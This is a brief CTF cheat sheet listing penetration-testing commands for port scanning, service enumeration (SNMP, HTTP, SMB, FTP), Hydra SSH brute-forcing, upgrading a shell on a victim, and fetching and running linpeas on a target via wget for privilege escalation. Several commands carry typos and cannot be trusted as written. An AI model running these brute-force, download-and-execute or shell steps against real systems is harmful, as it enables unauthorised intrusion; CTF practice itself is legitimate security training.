ctf setup

SCANNING AND ENUMERATION

1. Nmap -T4 -n <IP>

2. rustscan

3. Nmap -sVC -A <IP>

4. Nmap -p -T4 -n <IP>

5. 1. Nping <IP>

   2. Unicornscan <IP>

   3. Netdiscover -r <IP>

   4. hping3

   5. Masscan <IP> -p<PORTS>

6. Enum4linux <IP>

7. SNMP

8. 1. Onesixtyone -c communityfile.txt <IP>

   2. Nmap <IP> -Pn -sU -p 161 -script=smp-brute

   3. Snmpwalk -c community -vSNMPVersion target mibvalue

9. Http

10. 1. Robots.txt

    2. Admin.php

    3. Login.php

    4. Gobuster -u <IP> -w /usr/share/wordlists

    5. Wfuzz -w wordlist http://<IP>/FUZZ

    6. Dirb <IP>

    7. Sqlmap -u <IP>

11. SMB

12. 1. Nbtscan <IP>

    2. Smbclient -L //<IP>

    3. 1. Smbclient //mount/share

    4. Nmblookup -A <IP>

13. Ftp

14. 1. ***LOUD*** wget -r ftp://anonymous:@10.10.10.152

    2. Us: anonymous pw: anonymous

15. Ssh

16. Brute forcing

17. 1. Hydra -l admin -P pass.txt <IP> -r 4 ssh

18. Upgrading a dummy shell

19. On Victim see what version of python is installed find / -name python* 2>/dev/null

20. python# -C ‘import pty; pty.spawn(“/bin/bash”)’

21. Ctrl Z

22. Stty raw-echo;fg

Linux Privilege Escalation

on box (script enumeration)

1. Upload Linpeas to target into a writable directory ex:\tmp, \home\user

2. 1. On Kali start your own web server where linpeas resides. Sudo python -m http.server 80

   2. From victim wget http://Kali-IP/linpeas.sh

   3. On Victim make linpeas executable chmod +x linpeas.sh

   4. ./linpeas.sh